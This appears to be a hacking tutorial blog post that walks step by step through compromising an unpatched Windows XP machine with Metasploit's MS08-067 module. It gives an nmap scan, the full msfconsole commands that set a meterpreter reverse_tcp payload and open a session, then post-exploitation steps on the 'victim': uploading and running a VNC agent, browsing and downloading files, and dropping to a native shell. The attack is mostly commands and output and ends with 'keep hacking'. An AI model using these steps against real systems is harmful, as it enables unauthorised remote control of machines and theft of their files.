Hack windows xp with metasploit | tutorial

Hack windows xp with MS08-067 exploit

Using metasploit its possible to hack windows xp machines just by using the ip address of the victim machine. It does not involve installing any backdoor or trojan server on the victim machine. Metasploit does this by exploiting a vulnerability in windows samba service called ms08-67. This exploit works on windows xp upto version xp sp3.

The vulnerability/exploit module inside metasploit is

Name: Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi

Further details and references to the vulnerability can be found at the following pages

http://cvedetails.com/cve/2008-4250/
http://www.osvdb.org/49243
http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx
http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos

Note : This exploit is old as of now and will work only if the windows xp on the target machine is unpatched and not running any firewalls. If you were to scan a range of ip addresses to discover online windows xp machines, then most of them would likely be patched ( through automatic updates ).

So if you want to test and practise this exploit, setup a vulnerable unpatched xp system.

Scan for open ports

Before exploiting the xp machine with metasploit it is a good idea to scan for open ports using nmap to confirm that ports are accessible and accepting connections. Here is a quick example

root@kali:~# nmap -n -sV 192.168.1.4

Starting Nmap 6.25 ( http://nmap.org ) at 2013-05-03 06:27 PDT
Nmap scan report for 192.168.1.4
Host is up (0.00051s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
2869/tcp open  http         Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
MAC Address: 08:00:27:D3:2C:37 (Cadmus Computer Systems)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.52 seconds

Check the port number 445. It is running the microsoft-ds samba service. This service is used to share printers and files across the network. It is this service that is vulnerable to the above mentioned exploit and would be hacked next using metasploit.

Exploit using metasploit

1. The exploit is quite easy to launch. Start msfconsole.

Using notepad to track pentests? Have Metasploit Pro report on hosts,
services, sessions and evidence -- type 'go_pro' to launch it now.

       =[ metasploit v4.6.0-dev [core:4.6 api:1.0]
+ -- --=[ 1059 exploits - 595 auxiliary - 175 post
+ -- --=[ 277 payloads - 29 encoders - 8 nops

msf >

2. Select the exploit with 'use' command.

msf > use exploit/windows/smb/ms08_067_netapi 
msf exploit(ms08_067_netapi) >

If you want to read information about the exploit then type 'info' and hit enter.

3. See the options available

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) >

The important option to set is the RHOST (Remote Host). This is the ip address of the victim machine that is running the vulnerable windows xp. In this example the ip address is 192.168.1.4
So set the option

msf exploit(ms08_067_netapi) > set RHOST 192.168.1.4
RHOST => 192.168.1.4
msf exploit(ms08_067_netapi) >

4. Select the payload

Next comes the payload. Payload is that piece of code that runs along with the exploit and provides the hacker with a reverse shell. We are going to use the windows meterpreter payload. If you want to see all the available payloads then use the 'show payloads' command.

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

Why meterpreter ? Because meterpreter is a very powerful kind of reverse shell that has lots of functionality already built in. The functionality includes common post exploitation tasks like scanning the target's network, hardware, accessing devices etc. Meterpreter can also start a vnc session.

5. Check options once again

Now that we have selected out payload, its time to check the options once again.

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.4      yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) >

Now the options also include the payload options. The important options to set are LHOST and LPORT. The LHOST is the ip address of local machine or hacker machine. The LPORT is the port number on which the reverse shell listener will receive the incoming shell.

So setup the correct values

msf exploit(ms08_067_netapi) > set LHOST 192.168.1.33
LHOST => 192.168.1.33
msf exploit(ms08_067_netapi) > set LPORT 6666
LPORT => 6666
msf exploit(ms08_067_netapi) >

6. Launch the exploit

Now metasploit is all configured to launch the exploit. Enter 'exploit' and hit enter.

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.33:6666 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.4
[*] Meterpreter session 2 opened (192.168.1.33:6666 -> 192.168.1.4:1044) at 2013-05-03 03:27:25 -0700

meterpreter >

If it runs correctly you finally get the meterpreter shell. Type in help and hit enter to see what commands are available.

Lets try running some of the common commands.

Post Exploitation with meterpreter

Get system information

The 'sysinfo' command will get the system information of victim machine.

meterpreter > sysinfo
Computer        : ----------
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >

Shows some basic information about the windows installation.

Get network information

The 'ipconfig' command will show the network interfaces and their network configuration.

meterpreter > ipconfig

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0


Interface  2
============
Name         : AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC : 08:00:27:d3:2c:37
MTU          : 1500
IPv4 Address : 192.168.1.4
IPv4 Netmask : 255.255.255.0

Start vnc server

If you want a vnc session on the victim machine then run the vnc script.

meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.33 LPORT=4545)
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\rRlmDx.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.33:4545...
meterpreter >

It takes a few seconds, and then a window will popup with remote desktop on the vicitim machine. Now you can use your mouse to interact with the victim desktop as if it were your own.

Browsing the file system

For browsing the file system there are lots of linux style commands.

Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory

Get native shell

If you finally want the command prompt style shell on the victim machine enter 'shell' and hit enter.

meterpreter > shell
Process 1328 created.
Channel 3 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Now its the windows command prompt. Play around it and when done, type 'exit' and press enter. It will come back to the meterpreter session.

Next

The meterpreter commands shown above were just the basic commands of meterpreter. Meterpreter has lots of inbuilt scripts that can do lots of other things on the victim machine. We shall check them out in some other post.

So keep hacking till then.